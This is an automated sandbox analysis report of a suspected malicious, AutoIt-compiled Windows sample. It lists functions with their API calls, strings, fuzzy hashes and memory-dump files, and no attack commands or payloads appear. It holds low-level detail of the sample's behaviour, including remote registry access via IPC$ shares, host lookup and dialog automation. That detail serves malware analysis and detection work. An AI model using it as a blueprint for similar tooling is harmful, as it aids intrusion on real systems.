Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 6258e824224ed99e2fa4a2c4761ea51a0af6dc6f480ce316d14d8c2ddb991ee1
Instruction ID: 306090f915e51927d7fb456ac432286eb6d8bd2a9f1b90f841b22305f38597d5
Opcode Fuzzy Hash: 6258e824224ed99e2fa4a2c4761ea51a0af6dc6f480ce316d14d8c2ddb991ee1
Instruction Fuzzy Hash: AB02BD301293419FCB24EF20C8919AFBBE5EF99315F50481DF88A972A1DB30D969CF56

Function 002B2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002B2D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 002B2DDD
GetMenuItemCount.USER32(00315890), ref: 002B2E66
DeleteMenu.USER32(00315890,00000005,00000000,000000F5,?,?), ref: 002B2EF6
DeleteMenu.USER32(00315890,00000004,00000000), ref: 002B2EFE
DeleteMenu.USER32(00315890,00000006,00000000), ref: 002B2F06
DeleteMenu.USER32(00315890,00000003,00000000), ref: 002B2F0E
GetMenuItemCount.USER32(00315890), ref: 002B2F16
SetMenuItemInfoW.USER32(00315890,00000004,00000000,00000030), ref: 002B2F4C
GetCursorPos.USER32(?), ref: 002B2F56
SetForegroundWindow.USER32(00000000), ref: 002B2F5F
TrackPopupMenuEx.USER32(00315890,00000000,?,00000000,00000000,00000000), ref: 002B2F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002B2F7E

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: f85e29ee21ff1adca874e51fcd7bce73ba3890500e461ee36ba2f7ca8a300caa
Instruction ID: d0546146f3861d0da01287365e75e957585e233aa5847e64eb337648785f1a56
Opcode Fuzzy Hash: f85e29ee21ff1adca874e51fcd7bce73ba3890500e461ee36ba2f7ca8a300caa
Instruction Fuzzy Hash: 2E71F470611306FAEB218F15DC49FEABF64FB04394F144216F615AA1E1C7B1AC78CB94

Function 002C88AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002C88D7
CoInitialize.OLE32(00000000), ref: 002C8904
CoUninitialize.OLE32 ref: 002C890E
GetRunningObjectTable.OLE32(00000000,?), ref: 002C8A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 002C8B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,002E2C0C), ref: 002C8B6F
CoGetObject.OLE32(?,00000000,002E2C0C,?), ref: 002C8B92
SetErrorMode.KERNEL32(00000000), ref: 002C8BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002C8C25
VariantClear.OLEAUT32(?), ref: 002C8C35

Strings

,,., xrefs: 002C88C1

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,.
API String ID: 2395222682-737214711
Opcode ID: db4d32a2af06c5a39fc6c4e53765bf0a7dfa118c7b2e92b140c0bd95efa1fc0d
Instruction ID: 41251250b6d8d5a7e9f6330f7788404126957ad4066d822dd7aa0f7bb1e154d2
Opcode Fuzzy Hash: db4d32a2af06c5a39fc6c4e53765bf0a7dfa118c7b2e92b140c0bd95efa1fc0d
Instruction Fuzzy Hash: 83C134B1628305AFD700DF24C884E2AB7E9BF89348F004A5DF98ADB250DB71ED15CB52

Function 002A77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06

_memset.LIBCMT ref: 002A786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002A78A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002A78BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002A78D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002A7902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 002A792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002A7935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002A793A

Strings

SOFTWARE\Classes\, xrefs: 002A780C
\IPC$, xrefs: 002A7882
\CLSID, xrefs: 002A7822

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: d29b0d5910c3946c8bf6814ff91b988e5a12a1d08daf9aa6968e3a464df56a34
Instruction ID: 6855ab2d0cb810a9aac2b689180a88c27dfbed2df64badeb93bc69c5671fce90
Opcode Fuzzy Hash: d29b0d5910c3946c8bf6814ff91b988e5a12a1d08daf9aa6968e3a464df56a34
Instruction Fuzzy Hash: 28410872C25229ABCB11EFA4EC95DEEB778BF04751F00406AE905A31A1DB345E19CF94

Function 002D0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CFDAD,?,?), ref: 002D0E31

Strings

HKEY_CURRENT_USER, xrefs: 002D0F10
HKEY_CLASSES_ROOT, xrefs: 002D0EC4
HKEY_USERS, xrefs: 002D0F32
HKCU, xrefs: 002D0F21
HKLM, xrefs: 002D0EAF
HKEY_CURRENT_CONFIG, xrefs: 002D0EEE
HKCC, xrefs: 002D0EFF
HKU, xrefs: 002D0F43
HKCR, xrefs: 002D0ED9
HKEY_LOCAL_MACHINE, xrefs: 002D0E9A

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 9cb46927843f1164f019fb884d4cfe324427bb7ac2a31f6141d85792e6e9c963
Instruction ID: 54135021ceeabc186ce5227eb38d2f847f5d0fa754caae59f100c7a0f8cf14e5
Opcode Fuzzy Hash: 9cb46927843f1164f019fb884d4cfe324427bb7ac2a31f6141d85792e6e9c963
Instruction Fuzzy Hash: 7C417B7552024A8FCF11EF10E8A6BEF3764AF15700F644416FC951B6A2DB709D2ACBA0

Function 002AF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0028E2A0,00000010,?,Bad directive syntax error,002DF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 002AF7C2
LoadStringW.USER32(00000000,?,0028E2A0,00000010), ref: 002AF7C9

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

_wprintf.LIBCMT ref: 002AF7FC
__swprintf.LIBCMT ref: 002AF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002AF88D

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 002AF7F7
., xrefs: 002AF873
Error: , xrefs: 002AF85B
Line %d (File "%s"):, xrefs: 002AF833
Line %d:, xrefs: 002AF818

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 8f73bc44b78a612b33f7283f88493932208e9e2d0bd9fdac18330f0691737ff1
Instruction ID: d0b2db9f4904390af95bf754fd5410ca209a2c27da1e9acb37e3c768ada7fa7a
Opcode Fuzzy Hash: 8f73bc44b78a612b33f7283f88493932208e9e2d0bd9fdac18330f0691737ff1
Instruction Fuzzy Hash: FC21913186121EEFCF12EF90DC1AEED7738BF18301F044466F915660A2DA759A28DF54

Function 002B52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06

Part of subcall function 00257924: _memmove.LIBCMT ref: 002579AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002B5330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002B5346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002B5357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002B5369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002B537A

Strings

alias PlayMe, xrefs: 002B5309
open , xrefs: 002B52DF
status PlayMe mode, xrefs: 002B532B
play PlayMe wait, xrefs: 002B5364
close PlayMe, xrefs: 002B5341, 002B536E
play PlayMe, xrefs: 002B5375

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: aa0b360d9e0a062ad644d8dfb64d44b6a44010b878734cb767fec0ca6c36b064
Instruction ID: 206c80dc189458ff7afd1c05a25627b97915631d34a2214a7a1c9f54031ffa71
Opcode Fuzzy Hash: aa0b360d9e0a062ad644d8dfb64d44b6a44010b878734cb767fec0ca6c36b064
Instruction Fuzzy Hash: 6A11B6309A112D79D720BB61DC59DFF7BBCEB91B81F000459B841A60D1DEB00D18C9B4

Function 002B46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 002B46D2
gethostname.WSOCK32(?,00000100), ref: 002B46EC
gethostbyname.WSOCK32(?), ref: 002B46F9
_wcscpy.LIBCMT ref: 002B4721
_memmove.LIBCMT ref: 002B4734
inet_ntoa.WSOCK32(?), ref: 002B473F
_strcat.LIBCMT ref: 002B474D
_wcscpy.LIBCMT ref: 002B4764
WSACleanup.WSOCK32 ref: 002B4772
_wcscpy.LIBCMT ref: 002B4780

Strings

0.0.0.0, xrefs: 002B471B

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 99008d472f99706b865af2f20ea7e85afff56f0b5b7d6082191359fb63f17d4a
Instruction ID: b83db3b2a5d62ad2e38940b4edcf029ee92d2824126a48d37ad693de5eb50371
Opcode Fuzzy Hash: 99008d472f99706b865af2f20ea7e85afff56f0b5b7d6082191359fb63f17d4a
Instruction Fuzzy Hash: EE113D31920115AFDB20BB30AC8AEEAB7BCEF02311F0441B6F54AD6092FF709D95DA55

Function 002B4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 002B4F7A

Part of subcall function 0027049F: timeGetTime.WINMM(?,75A8B400,00260E7B), ref: 002704A3

Sleep.KERNEL32(0000000A), ref: 002B4FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 002B4FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002B4FEC
SetActiveWindow.USER32 ref: 002B500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002B5019
SendMessageW.USER32(00000010,00000000,00000000), ref: 002B5038
Sleep.KERNEL32(000000FA), ref: 002B5043
IsWindow.USER32 ref: 002B504F
EndDialog.USER32(00000000), ref: 002B5060

Strings

BUTTON, xrefs: 002B4FDE

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: e9e1169e67105fd25b5574cec776e12891f0c2b8c13c813cf827e926d66c3e02
Instruction ID: 1aea502a5ae7a9a047cc48fb3298f14c23a26be2f8ce2a1a5d23a5c2713e1eb4
Opcode Fuzzy Hash: e9e1169e67105fd25b5574cec776e12891f0c2b8c13c813cf827e926d66c3e02
Instruction Fuzzy Hash: A821F970616601BFE7116F60FDCDBF63BAEEB4E385F045425F106821B1CB718D208A65

Function 002BD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC

CoInitialize.OLE32(00000000), ref: 002BD5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002BD67D
SHGetDesktopFolder.SHELL32(?), ref: 002BD691
CoCreateInstance.OLE32(002E2D7C,00000000,00000001,00308C1C,?), ref: 002BD6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002BD74C
CoTaskMemFree.OLE32(?,?), ref: 002BD7A4
_memset.LIBCMT ref: 002BD7E1
SHBrowseForFolderW.SHELL32(?), ref: 002BD81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002BD840
CoTaskMemFree.OLE32(00000000), ref: 002BD847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002BD87E
CoUninitialize.OLE32(00000001,00000000), ref: 002BD880

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 71ecb0b0a39df791a08894249a63e664e8330274c2cf1d0deeb78f183b81e476
Instruction ID: 432f3ced38915bbd3e9d9680d91c8f3e53f5ee586b51e65f7b06306e9eb1a521
Opcode Fuzzy Hash: 71ecb0b0a39df791a08894249a63e664e8330274c2cf1d0deeb78f183b81e476
Instruction Fuzzy Hash: 4AB10975A10109EFDB04DFA4D888DEEBBB9EF48304B148469E90AEB261DB30ED55CF54

Function 002AC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 002AC283
GetWindowRect.USER32(00000000,?), ref: 002AC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 002AC2F3
GetDlgItem.USER32(?,00000002), ref: 002AC2FE
GetWindowRect.USER32(00000000,?), ref: 002AC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 002AC364
GetDlgItem.USER32(?,000003E9), ref: 002AC372
GetWindowRect.USER32(00000000,?), ref: 002AC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 002AC3C6
GetDlgItem.USER32(?,000003EA), ref: 002AC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002AC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 002AC3FE

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: f899a1b9cd995a0f180a9a1eab12f9bad8dc4befda5d358e302ed5c71d4b608c
Instruction ID: 15981a9deb1a9106a347a3cbdede4163458475c836db2ebf7e577147739ea253
Opcode Fuzzy Hash: f899a1b9cd995a0f180a9a1eab12f9bad8dc4befda5d358e302ed5c71d4b608c
Instruction Fuzzy Hash: EA514271F10205AFDF18CFA9DD89AAEBBB9EB88310F14812DF516D7290DB709D008B54

Function 0025201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00251B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00252036,?,00000000,?,?,?,?,002516CB,00000000,?), ref: 00251B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002520D3
KillTimer.USER32(-00000001,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0025216E
DestroyAcceleratorTable.USER32(00000000), ref: 0028BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0028BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0028BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002516CB,00000000,?,?,00251AE2,?,?), ref: 0028BD0A
DeleteObject.GDI32(00000000), ref: 0028BD1C

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 1665191978061a63a85396f777b7d12c7924faf20acbc0210b60f6d7671f7323
Instruction ID: 352841b699890e6dd276e509f894ad709eb1aa44ad62d3f93d53f3901403c11e
Opcode Fuzzy Hash: 1665191978061a63a85396f777b7d12c7924faf20acbc0210b60f6d7671f7323
Instruction Fuzzy Hash: E5618E35622A01DFDB36AF14D948B66B7F1FB95312F10842DE842579E1C770ACA9CF48

Function 002521A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 002525DB: GetWindowLongW.USER32(?,000000EB), ref: 002525EC

GetSysColor.USER32(0000000F), ref: 002521D3

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 6d4a7a1dd4312439676a31fbbd14f8cd2c206f9f5a61820fc234bf89e4aca6e7
Instruction ID: fbc6b02ca847a2452753e3a26a4a8bb7ab54a98d74dd6ef47957461a39b418d2
Opcode Fuzzy Hash: 6d4a7a1dd4312439676a31fbbd14f8cd2c206f9f5a61820fc234bf89e4aca6e7
Instruction Fuzzy Hash: 0D41F839511101DFDB215F28EC88BB93B65EB07332F544266FD65CA1E1C7318C5ADB19

Function 002BA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,002DF910), ref: 002BA90B
GetDriveTypeW.KERNEL32(00000061,003089A0,00000061), ref: 002BA9D5
_wcscpy.LIBCMT ref: 002BA9FF

Strings

cdrom, xrefs: 002BA927
all, xrefs: 002BA911
ramdisk, xrefs: 002BA97F
unknown, xrefs: 002BA996
network, xrefs: 002BA969
fixed, xrefs: 002BA953
removable, xrefs: 002BA93D

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 6b3c73827fe79cf6e7f76d1309c17c2daabf6e1b6fd0fbbc457c3a13cc3678b1
Instruction ID: 093e01af3e07d5b05b26766bff36371412ea802d571ac4ff860fdf2c1b449ebe
Opcode Fuzzy Hash: 6b3c73827fe79cf6e7f76d1309c17c2daabf6e1b6fd0fbbc457c3a13cc3678b1
Instruction Fuzzy Hash: B051AC315383019BC300EF14C892AAFB7A5FF84780F54482DF996572A2DB719D29CE93

Function 00259837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00259862
__swprintf.LIBCMT ref: 002598AC
__i64tow.LIBCMT ref: 0028F5E6

Strings

%.15g, xrefs: 002598A6
0x%p, xrefs: 0028F5C8
False, xrefs: 0028F5AE
True, xrefs: 0028F5A7

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
